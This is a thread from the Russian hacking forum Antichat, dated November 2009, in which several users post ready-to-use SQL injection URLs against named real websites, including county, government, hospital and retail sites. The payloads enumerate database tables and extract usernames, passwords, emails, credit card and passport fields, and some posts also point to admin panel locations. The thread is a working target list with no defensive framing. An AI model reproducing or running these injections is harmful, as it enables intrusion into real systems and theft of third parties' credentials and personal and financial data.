ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11261  
Старый 19.11.2009, 19:36
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name )+from+information_schema.columns+where+table_name =0x7573657273
users::username,password,userid,userlevel,email,ti mestamp
http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,username,0x 3a,password,0x3a,email,0x3a,userlevel)+from+users
MySQL 5.0.51b-community-nt
admin panel: http://www.barnstablecounty.org/admin.php

================================================== =============
MySQL 5.0.81-community-log
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4+from+information_schema.columns+where+table_name =0x6372656469745f7573657273
credit_users::id:user_mail:user_passassport_numb erassport_series
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user_ mail,0x3a,user_pass,0x3a,passport_number,0x3a,pass port_series),4+from+credit_users

Последний раз редактировалось Bb0y; 19.11.2009 в 22:24..
 
Ответить с цитированием

  #11262  
Старый 20.11.2009, 02:12
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,user_ id,username,userpass))),2,3,4,5,6+from+poll_user--

http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,a_log in,a_pass,a_surname,a_name))),2,3,4,5,6+from+admer--

Последний раз редактировалось 547; 20.11.2009 в 02:18..
 
Ответить с цитированием

  #11263  
Старый 20.11.2009, 12:53
Аватар для IgAlex
IgAlex
Познающий
Регистрация: 17.11.2008
Сообщений: 48
Провел на форуме:
351316

Репутация: 71
По умолчанию

semiramidasales.com

Код:
http://semiramidasales.com/borovets/gallery_view.php?gallery_id=5+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4--
Version: 5.0.77
User: semiramidasales@localhost
Database: semiramidasales

automaticgates.co.uk

Код:
http://www.automaticgates.co.uk/gallery_view.php?gallery_id=-99999+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--
Version: 5.0.81-community
User: rogerw_agssite@localhost
Database: rogerw_ags
 
Ответить с цитированием

  #11264  
Старый 21.11.2009, 03:03
Аватар для Twin $park
Twin $park
Новичок
Регистрация: 15.11.2009
Сообщений: 8
Провел на форуме:
31294

Репутация: 79
По умолчанию

PG SQL

Код:
http://www.agetop.go.gov.br/index.php?idMateria=1+and+1=version()::int
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6
 
Ответить с цитированием

  #11265  
Старый 21.11.2009, 16:51
Аватар для hack-win32
hack-win32
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588

Репутация: 99
По умолчанию

u70375524@cgihost:d60343682:5.0.77-log
Код:
http://curlingwarmers.com/view_product.php?id=-24+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--

dearpret_blog@localhost:dearpret_dearpretty:5.0.81-community
Код:
http://www.dearpretty.com/view_product.php?id=-29+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12--
alcolor_gvam@localhost:alcolor_alcolor:4.1.22-standard-log
Код:
http://www.alcolor.com/view_product.php?pid=4&id=-15+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

jhatsdbadmin@lsh1006.lsh.chicago.hostway:jhatsprod db:5.0.32-Debian_7etch6-log
Код:
http://jhats.com/view_product.php?prod_id=-105+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
 
Ответить с цитированием

  #11266  
Старый 21.11.2009, 22:29
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7765625f7573657273--
web_users::id:imerezime:adresa:zemlja:email:br_kreditne:t elefon:aktivanassword:username:rabat:zip:mjesto
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,ime,0x3a,adre sa,0x3a,zemlja,0x3a,email,0x3a,br_kreditne,0x3a,te lefon,0x3a,aktivan,0x3a,password,0x3a,username,0x3 a,rabat,0x3a,zip,0x3a,mjesto),4,5,6,7+from+web_use rs
__________________________________________________ ______
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7573657273--
users::id:usernameasswordwd_token:admin:name:lastna merivs:email
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,usern ame,0x3a,password,0x3a,admin,0x3a,email),4,5,6,7+f rom+users
admin panel: http://www.aura-maris.com/admin/
MySQL 5.0.81-community-log
 
Ответить с цитированием

  #11267  
Старый 22.11.2009, 00:50
Аватар для EndLeSSDre@M
EndLeSSDre@M
Участник форума
Регистрация: 18.07.2009
Сообщений: 278
Провел на форуме:
3055344

Репутация: 259
Отправить сообщение для EndLeSSDre@M с помощью ICQ
По умолчанию

www.fishcom.ru

Код:
http://www.fishcom.ru/page.php?r=35'+union+select+1,2,3,4,5,6,concat_ws(0x20,user_login,user_password),8,9,10,11,12,13,14+from+cms_users/*
 
Ответить с цитированием

  #11268  
Старый 22.11.2009, 01:03
Аватар для fox_malder
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
Провел на форуме:
3193846

Репутация: 242
По умолчанию

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,DATABAS E(),4,5,6,7,8+--+
cida_ge

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,VERSION (),4,5,6,7,8+--+
5.0.51-log

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,USER(), 4,5,6,7,8+--+
cida_ge@localhost

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,table_n ame,4,5,6,7,8+from+information_schema.tables+limit +42,1+--+
user

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,passwd, 4,5,name,7,8+from+user+--+

Последний раз редактировалось jokester; 22.11.2009 в 01:09.. Причина: пароль
 
Ответить с цитированием

  #11269  
Старый 22.11.2009, 01:51
Аватар для F4R
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://www.mss.gov.si/si/okroznice_razpisi_in_javna_narocila/javni_razpisi/?tx_t3javnirazpis_pi1%5Bshow_single%5D=1028+UNION+ SELECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYP T(CONCAT_WS(0x3a,Version(),Database(),User()),0x71 ),0x71),12,13,14,15,16,17,18,19,20--
Database Version: 4.1.10a
Database name: mss
User name: mss@localhost
 
Ответить с цитированием

  #11270  
Старый 22.11.2009, 02:03
Аватар для F4R
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://www.bolnisnica-po.si/index.php?id=110+UNION+SELECT+1,2,3,4,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),6+LIMIT+1,1--
Database Version: 4.1.15-Debian_1ubuntu5-log
Database name: gigaspark2_bolnica
User name: bolnica_user@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ